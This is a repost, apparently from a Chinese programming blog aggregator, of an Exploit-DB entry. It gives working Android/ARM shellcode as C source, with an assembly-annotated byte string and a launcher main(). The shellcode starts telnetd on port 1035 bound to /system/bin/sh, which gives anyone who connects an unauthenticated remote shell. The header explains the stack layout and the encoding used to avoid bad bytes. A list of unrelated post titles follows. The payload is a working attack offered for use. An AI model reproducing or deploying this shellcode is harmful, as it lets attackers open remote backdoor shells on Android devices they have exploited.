Android Shellcode Telnetd with Parameters
来源:互联网 发布:java查询redis数据库 编辑:程序博客网 时间:2024/06/05 03:22
/* Title: Android/ARM - telnetd with three parameters and an environment variableDate: 2015-07-31Tested on: Android Emulator and Samsung Note 10.1 (Android version 4.1.2)Author: Steven Padilla - email: spadilla@tresys.comOrganization: Tresys LLCVendor HomePage: www.tresys.comVersion: 1.0 Android ARM shellcode with dynamic string creation and including no0x20, 0x0a and 0x00. This shellcode will execute telnetd listening on port 1035. Wheneveranyone connects to port 1035 they will be presented with a shellprompt. This code assumes that telnetd and sh are executables in the/system/bin/ directory. In order to minimize the length of the shellcode the beginning of thepath /system/bin/ is created once and stored three times. The executable name (/system/bin/telnetd), the other two paramaters(-p1035 and -l/system/bin/sh) and the environment variable(PATH=/system/bin) are strings that are created and stored in memoryabove the top of the stack. The strings are created by first moving abyte to register1, left shitf register1 8 bits, add the next byte,left shift again, add the next byte, left shift again and then addingthe fourth byte. Note that due to endianess the bytes are added inreverse order. Thus if the string to be created is "/adb" the 'b'would be moved into r1, followed by the shift and then the 'd' isadded, shift, then the 'a', shift, and finally the '/'. In the example below the stack pointer has the value 0xbe91da08. Right before calling the execve call (i.e., svc 1 with register 7 containing11) register0 is loaded with the 0xbe91da24, register1 is loaded withthe 0xbe91da0c and register2 is loaded with 0xbe91da1c. The memoryabove the stack should look like the following (note to make it easierto read the strings are presented in the order they appear if you readthem as strings. If you look at each word you will see the bytes inreverse order due to endianess) : +----------------------------------+0xbe91da08 | NULL | This is where the stack | | pointer is pointing. +----------------------------------+0xbe91da0c | 0xbe91da24 | These first three entries | | are pointers to the path | | of the executable and its | | two parameters. +----------------------------------+0xbe91da10 | 0xbe91da50 | +----------------------------------+0xbe91da14 | 0xbe91da5f | +----------------------------------+0xbe91da18 | NULL | The list of parameters must | | be terminated by a NULL. +----------------------------------+0xbe91da1c | 0xbe91da88 | This points to the first | | (and only) environment | | variable. +----------------------------------+0xbe91da20 | NULL | The list of environment | | variables must be terminated | | by a NULL. +----------------------------------+0xbe91da24 | "//system/bin/telnetd" | This is where the name of | | the executable and the first | | parameter is stored. +----------------------------------+0xbe91da50 | "-p1035" | This is where the second | | parameter is stored. +----------------------------------+0xbe91da5f | "-l/system/bin/sh" | This is where the third | | parameter is stored. +----------------------------------+0xbe91da88 | "PATH=/system/bin/" | This is where the first | | environment variable is | | stored. +----------------------------------+ */ #include <stdio.h>#include <string.h> char *SC = "\x01\x30\x8f\xe2" //add r3,pc, #1 "\x13\xff\x2f\xe1" //bx r3 "\x78\x46" //mov r0, pc "\x18\x30" //adds r0, 0x18 "\x92\x1a" // subs r2,r2,r2 "\x49\x1a" // subs r1, r1, r1 "\x6a\x44" // add r2, sp "\x79\x21" // mov r1, 'y' "\x09\x02" // LSL r1,r1, #8 "\x73\x31" // adds r1, 's' "\x09\x02" // LSL r1,r1, #8 "\x2f\x31" // adds r1, '/' "\x09\x02" // LSL r1,r1, #8 "\x2f\x31" // adds r1, '/' "\x07\x91" // str r1, [sp, #4] "\x12\x25" // mov r5, 0x12 "\x4d\x40" // eor r5,r1 "\x21\x95" // str r5, [sp, #4] "\x43\x25" // mov r5, 0x43 "\x4d\x40" // eor r5,r1 "\x16\x95" // str r5, [sp, #4] "\x6d\x21" // mov r1, 'm' "\x09\x02" // LSL r1,r1, #8 "\x65\x31" // adds r1, 'e' "\x09\x02" // LSL r1,r1, #8 "\x74\x31" // adds r1, 't' "\x09\x02" // LSL r1,r1, #8 "\x73\x31" // adds r1, 's' "\x08\x91" // str r1, [sp, 0x8] "\x17\x91" // str r1, [sp, 0x17] "\x22\x91" // str r1, [sp, 0x22] "\x6e\x21" // mov r1, 'n' "\x09\x02" // LSL r1,r1, #8 "\x69\x31" // adds r1, 'i' "\x09\x02" // LSL r1,r1, #8 "\x62\x31" // adds r1, 'b' "\x09\x02" // LSL r1,r1, #8 "\x2f\x31" // adds r1, '/' "\x09\x91" // str r1, [sp, 0x9] "\x18\x91" // str r1, [sp, 0x18] "\x23\x91" // str r1, [sp, 0x23] "\x6c\x21" // mov r1, 'l' "\x09\x02" // LSL r1,r1, #8 "\x65\x31" // adds r1, 'e' "\x09\x02" // LSL r1,r1, #8 "\x74\x31" // adds r1, 't' "\x09\x02" // LSL r1,r1, #8 "\x2f\x31" // adds r1, '/' "\x28\x24" // mov r4, 0x0f "\x11\x51" // str r1, [r2, r4] "\x6c\x25" // mov r5, 'l' "\x2d\x02" // LSL r1,r1, #8 "\x0d\x35" // adds r5, 0x0d "\x2d\x02" // LSL r1,r1, #8 "\x07\x35" // adds r5, 0x07 "\x2d\x02" // LSL r1,r1, #8 "\x4d\x40" // eor r5,r1 "\x19\x95" // str r5, [sp, 0x19] "\x64\x21" // mov r1, 'd' "\x09\x02" // LSL r1,r1, #8 "\x74\x31" // adds r1, 't' "\x09\x02" // LSL r1,r1, #8 "\x65\x31" // adds r1, 'e' "\x09\x02" // LSL r1,r1, #8 "\x6e\x31" // adds r1, 'n' "\x0b\x91" // str r1, [sp, 0xb] "\x49\x1a" // subs r1, r1, r1 "\x0c\x91" // str r1, [sp, 0xc] "\x30\x21" // mov r1, '0' "\x09\x02" // LSL r1,r1, #8 "\x31\x31" // adds r1, '1' "\x09\x02" // LSL r1,r1, #8 "\x70\x31" // adds r1, 'p' "\x09\x02" // LSL r1,r1, #8 "\x2d\x31" // adds r1, '-' "\x12\x91" // str r1, [sp, #44] "\x49\x1a" // subs r1, r1, r1 "\x35\x31" // add r1, '5' "\x09\x02" // LSL r1,r1, #8 "\x33\x31" // adds r1, '3' "\x13\x91" // str r1, [sp, 0x13] "\x49\x1a" // subs r1, r1, r1 "\x14\x91" // str r1, [sp, 0x14] "\x2d\x21" // mov r1, '-' "\x09\x02" // LSL r1,r1, #8 "\x09\x02" // LSL r1,r1, #8 "\x09\x02" // LSL r1,r1, #8 "\x15\x91" // str r1, [sp, 0x15] "\x49\x1a" // subs r1, r1, r1 "\x1f\x91" // str r1, [sp, 0x1f] "\x48\x21" // mov r1, 'H' "\x09\x02" // LSL r1,r1, #8 "\x54\x31" // adds r1, 'T' "\x09\x02" // LSL r1,r1, #8 "\x41\x31" // adds r1, 'A' "\x09\x02" // LSL r1,r1, #8 "\x50\x31" // adds r1, 'P' "\x80\x24" // mov r4, 0x0f "\x11\x51" // str r1, [r2, r4] "\x2f\x21" // mov r1, '/' "\x24\x91" // str r1, [sp, 0x24] "\x04\x32" // add r2, 0x4 "\x49\x1a" // subs r1, r1, r1 "\x11\x1c" // add r1, r2, #0 "\x18\x31" // add r1, 0x18 "\x01\x91" // str r1, [sp, 0x1] "\x2c\x31" // add r1, #40 "\x02\x91" // str r1, [sp, 0x2] "\x0f\x31" // add r1, #4 "\x03\x91" // str r1, [sp, 0x3] "\x29\x31" // add r1, #28 "\x05\x91" // str r1, [sp, #0x5] "\x49\x1a" // subs r1, r1, r1 "\x04\x91" // str r1, [sp, 0x4] "\x06\x91" // str r1, [sp, 0x6] "\x10\x1c" // add r0, r2, #0 "\x18\x30" // add r0, 0x18 "\x11\x1c" // add r1, r2, #0 "\x10\x32" // adds r2, 0x10 "\xdb\x1a" // subs r3, r3, r3 "\x0b\x27" //movs r7,#11 "\x01\xdf"; //svc 1 int main(void){ (*(void(*) ()) SC) (); return 0;}来自:https://www.exploit-db.com/exploits/38194/
0 0
- Android Shellcode Telnetd with Parameters
- telnetd for android
- Specify parameters with SQLMAP
- How to Upload Multiple files in one request along with other string parameters in android?
- Android Camera Parameters
- Android Camera Parameters 获取
- Android Camera Parameters
- android-Camera.Parameters
- Android Camera.Parameters.setRecordingHint
- android-Camera.Parameters
- About android mk parameters
- android camera Parameters
- shellcode
- Shellcode
- Shellcode
- shellcode
- shellcode
- shellcode
- Java中常用数据结构的实现类 Collection和Map
- ARC和MRC下的单例
- python import UMD has deleted
- 解决约瑟夫问题
- eclipse工具栏不显示sdk和adb图标?
- Android Shellcode Telnetd with Parameters
- centos下openvpn的一键安装脚本
- 237 Delete Node in a Linked List
- 100 Same Tree
- iOS9的网络请求简述
- hdu3394Railway【双连通分量+模板详细解释】
- 用html写的小计算机应用
- 1010. Radix (25)
- 无法解析的外部符号解决方法汇总